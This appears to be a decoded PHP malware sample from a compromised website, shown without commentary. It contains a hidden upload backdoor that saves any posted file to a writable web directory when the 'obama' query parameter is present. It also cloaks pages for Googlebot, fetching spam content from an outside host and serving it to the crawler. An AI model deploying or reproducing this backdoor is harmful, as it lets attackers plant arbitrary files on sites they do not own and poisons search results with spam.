/* Decoded by unphp.net */ error_reporting(E_ALL); ini_set("display_errors",0); $root=$_SERVER['DOCUMENT_ROOT']."/data/"; if(!file_exists($root)) $root=$_SERVER['DOCUMENT_ROOT']."/wp-content/uploads/"; if(file_perms($root,true)!="777") $root=$_SERVER['DOCUMENT_ROOT']."/data/"; if(!file_exists($root)) $root=$_SERVER['DOCUMENT_ROOT']."/upload/"; if(file_perms($root,true)!="777") $root=$_SERVER['DOCUMENT_ROOT']."/data/"; if(!file_exists($root)) $root=$_SERVER['DOCUMENT_ROOT']."/images/"; if(file_perms($root,true)!="777") $root=$_SERVER['DOCUMENT_ROOT']."/data/"; if(!file_exists($root)) $root=$_SERVER['DOCUMENT_ROOT']."/cache/"; if(file_perms($root,true)!="777") $root=$_SERVER['DOCUMENT_ROOT']."/data/"; if(isset($_GET["obama"])) { if($_SERVER['REQUEST_METHOD']=="POST") { $fname=$_FILES["myFile"]["name"]; move_uploaded_file($_FILES["myFile"]["tmp_name"],$root."/" .$fname); echo $root."/" .$fname; } ;echo '
'; exit(); } if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']),"googlebot")) if(isset($_GET["p"])) { $seo = str_replace(".html","",$_GET["p"]); $url=$seo; $url=str_replace(".html","",$url); $file=md5($url); if(!file_exists($root.$file.".tpl")) { $str=file_get_contents("http://rss.plus-transdatagoogle.com/?mod=seo&site=".$_SERVER['SERVER_NAME']."&url=".$url); if(strlen($str)>100) @file_put_contents($root.$file.".tpl",$str); } echo base64_decode(@file_get_contents($root.$file.".tpl")); exit(); } function file_perms($file, $octal = false) { if(!file_exists($file)) return false; $perms = fileperms($file); $cut = $octal ? 2 : 3; return substr(decoct($perms), $cut); }